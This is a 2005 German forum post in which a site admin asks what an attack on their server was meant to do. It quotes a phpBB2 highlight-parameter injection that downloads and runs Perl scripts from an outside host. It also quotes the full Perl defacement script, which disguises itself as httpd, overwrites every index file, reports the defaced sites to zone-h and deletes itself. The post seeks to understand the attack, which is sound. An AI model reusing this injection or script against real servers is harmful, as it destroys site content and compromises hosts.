Verfasst: 05.07.2005 15:16
Ich hatte heute einen neuen Angriff:
und dieses Skript wurd dann aufgerufen:
Weiss jemand von Euch was dieses Skript bezweckt?
Code: Alles auswählen
/phpBB2/viewtopic.php?t=376&highlight=\'.system(\'ls%09/;cd%09/tmp;wget%09www.spykids.info/po.txt;perl%09po.txt;wget%09www.spykids.info/putz.1.txt;perl%09putz.1.txt\').\'
und dieses Skript wurd dann aufgerufen:
Code: Alles auswählen
#!/usr/bin/perl
$arquivo = $0;
my $processo = "/usr/local/sbin/httpd - spy";
$SIG{"INT"} = "IGNORE";
$SIG{"HUP"} = "IGNORE";
$SIG{"TERM"} = "IGNORE";
$SIG{"CHLD"} = "IGNORE";
$SIG{"PS"} = "IGNORE";
$0="$processo"."\0"x16;;
my $pid=fork;
exit if $pid;
die "Problema com o fork: $!" unless defined($pid);
use IO::Socket::INET;
`find / -name index.* >> bah`;
open(a,"<bah");
@dir = <a>;
close(a);
$b = scalar(@dir);
for($a=0;$a<=$b;$a++)
{
chomp $dir[$a];
system("echo spykids spykids > $dir[$a]");
}
`locate httpd.conf >> porra`;
open(a,"<porra");
@po = <a>;
close(a);
foreach $po (@po){
chomp $po;
`cat $po |grep ServerName >> bah1`;
}
open(a,"<bah1");
@site = <a>;
close(a);
$b = scalar(@site);
for($a=0;$a<=$b;$a++)
{
chomp $site[$a];
$site[$a] =~ s/#//g;
$site[$a] =~ s/servername//g;
$site[$a] =~ s/ServerName//g;
$site[$a] =~ s/ //g;
$sock = IO::Socket::INET->new(PeerAddr => $site[$a], PeerPort => 80, Proto => "tcp") or next;
print $sock "GET / HTTP/1.0\n\n";
@ow = <$sock>;
close($sock);
$ae = "";
$ae = "@ow";
if($ae =~/spykids/){
print "$site[$a]\n";
$sock = IO::Socket::INET->new(PeerAddr => "www.zone-h.org", PeerPort => 80, Proto => "tcp") or die "nao conectou";
print $sock "POST /en/defacements/notify HTTP/1.0\r\n";
print $sock "Accept: */*\r\n";
print $sock "Referer: http://www.zone-h.org/en/defacements/notify\r\n";
print $sock "Accept-Language: pt-br\r\n";
print $sock "Content-Type: application/x-www-form-urlencoded\r\n";
print $sock "Connection: Keep-Alive\r\n";
print $sock "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n";
print $sock "Host: www.zone-h.org\r\n";
print $sock "Content-Length: 385\r\n";
print $sock "Pragma: no-cache\r\n";
print $sock "\r\n";
print $sock "notify_defacer=SpyKids¬ify_domain=http%3A%2F%2F$site[$a]¬ify_hackmode=22¬ify_reason=5¬ify=+OK+\r\n";
close($sock);
}
}
system("rm -rf $arquivo");